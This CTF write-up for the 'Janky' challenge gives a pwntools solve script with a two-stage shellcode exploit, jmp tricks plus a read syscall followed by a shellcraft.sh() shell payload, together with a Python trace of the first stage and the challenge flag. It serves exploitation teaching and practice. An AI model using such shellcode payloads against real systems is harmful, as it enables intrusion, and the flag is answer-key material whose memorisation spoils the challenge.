
Janky

Challenge

Constrained staged shellcode: the first stage sets up the registers for a read syscall, and the second stage sends the shell payload.

Solution

Key solve code:

from pwn import *

context.arch = "amd64"
p = process("./PLACEHOLDER_BINARY")  # placeholder: the writeup does not give the binary path

# Two-byte "jmp +1": hops over the single \xe9 byte placed right after it.
skip = asm("""
jmp here+1
here:
""")
# rsi = rdx, which must hold the shellcode buffer address at entry for the
# second stage to land in place; rdi = 0 (stdin)
set_rdi_rsi = asm("""
push rdx
pop rsi
xor edi, edi
""")
# rdx = read length; mov al only writes the low byte of rax, so this is 255
# only if the upper bytes of eax were already zero
set_rdx = asm("""
mov al, 255
mov edx, eax
""")
# rax = 0 (SYS_read), then read(0, rsi, rdx) overwrites the buffer in place
set_rax_syscall = asm("""
xor eax, eax
syscall
""")

first = skip + b"\xe9" + set_rdi_rsi + skip + b"\xe9" + set_rdx + skip + b"\xe9" + set_rax_syscall
p.send(first)
# Execution resumes right after the syscall, at offset len(first) into the buffer,
# so pad the second stage to that length and place the shell payload there.
p.send(b"A" * len(first) + asm(shellcraft.sh()))
p.interactive()
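To see why the second stage is padded by exactly len(first) bytes, here is an added example (not part of the original writeup) that traces the first stage in pure Python. The byte strings are hand-assembled encodings of the asm() snippets above, constructed here to match what pwntools emits for amd64; the entry values of rdx and rax are assumptions passed in by the caller. The trace shows which offsets execute, that every \xe9 byte is hopped over by the preceding jmp +1, that execution resumes at offset 21 after the syscall, and that mov al, 255 only writes the low byte of rax, so the read count is 255 only if the upper bytes of eax were already zero at entry.

```python
# Added example, not the writeup's own code: a pure-Python trace of the first stage.
# Hand-assembled (constructed here) encodings of the writeup's asm() snippets for amd64.
SKIP = b"\xeb\x01"                     # jmp here+1   (jmp rel8 with displacement +1)
E9 = b"\xe9"                           # the byte each jmp hops over (opcode of jmp rel32)
SET_RDI_RSI = b"\x52\x5e\x31\xff"      # push rdx ; pop rsi ; xor edi, edi
SET_RDX = b"\xb0\xff\x89\xc2"          # mov al, 255 ; mov edx, eax
SET_RAX_SYSCALL = b"\x31\xc0\x0f\x05"  # xor eax, eax ; syscall


def build_first_stage():
    """Same layout as `first` in the writeup: 21 bytes."""
    return (SKIP + E9 + SET_RDI_RSI
            + SKIP + E9 + SET_RDX
            + SKIP + E9 + SET_RAX_SYSCALL)


def trace(code, rdx, rax=0):
    """Decode and execute only the opcodes the first stage uses, starting at offset 0.

    rdx: assumed value of rdx at entry (the buffer address the solve relies on).
    rax: assumed value of rax at entry; its upper bytes survive `mov al, 255`.
    Returns (registers at the syscall, offset where execution resumes after it,
    list of offsets that were executed).
    """
    regs = {"rax": rax, "rdi": 0xBADBAD, "rsi": 0xBADBAD, "rdx": rdx}
    stack = []
    rip = 0
    executed = []
    while rip < len(code):
        executed.append(rip)
        op = code[rip]
        pair = code[rip:rip + 2]
        if op == 0xEB:                          # jmp rel8 (signed 8-bit displacement)
            rel = code[rip + 1]
            rip += 2 + (rel - 256 if rel >= 128 else rel)
        elif op == 0xE9:                        # jmp rel32: must never be reached
            raise RuntimeError(f"jmp rel32 byte executed at offset {rip}")
        elif op == 0x52:                        # push rdx
            stack.append(regs["rdx"])
            rip += 1
        elif op == 0x5E:                        # pop rsi
            regs["rsi"] = stack.pop()
            rip += 1
        elif pair == b"\x31\xff":               # xor edi, edi (zero-extends into rdi)
            regs["rdi"] = 0
            rip += 2
        elif op == 0xB0:                        # mov al, imm8 (only the low byte changes)
            regs["rax"] = (regs["rax"] & ~0xFF) | code[rip + 1]
            rip += 2
        elif pair == b"\x89\xc2":               # mov edx, eax (zero-extends into rdx)
            regs["rdx"] = regs["rax"] & 0xFFFFFFFF
            rip += 2
        elif pair == b"\x31\xc0":               # xor eax, eax
            regs["rax"] = 0
            rip += 2
        elif pair == b"\x0f\x05":               # syscall: stop here and report the state
            return regs, rip + 2, executed
        else:
            raise ValueError(f"unhandled byte {op:#04x} at offset {rip}")
    raise RuntimeError("ran off the end without reaching syscall")


if __name__ == "__main__":
    first = build_first_stage()
    regs, resume_at, executed = trace(first, rdx=0x7FFC_0000_0000)
    print("syscall with rax=%d rdi=%d rsi=%#x rdx=%d"
          % (regs["rax"], regs["rdi"], regs["rsi"], regs["rdx"]))
    print("executed offsets:", executed)
    print("second stage padding:", resume_at, "bytes; len(first) =", len(first))
```

With rax = 0 at entry the syscall is read(0, rdx, 255) and execution resumes at offset 21, which is len(first); with rax = 0x100 at entry the same bytes request 0x1ff bytes instead, which is harmless here but is the kind of hidden dependency worth checking before reusing a snippet like set_rdx.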

Flag

gigem{jump1ng_thr0ugh_h00p5}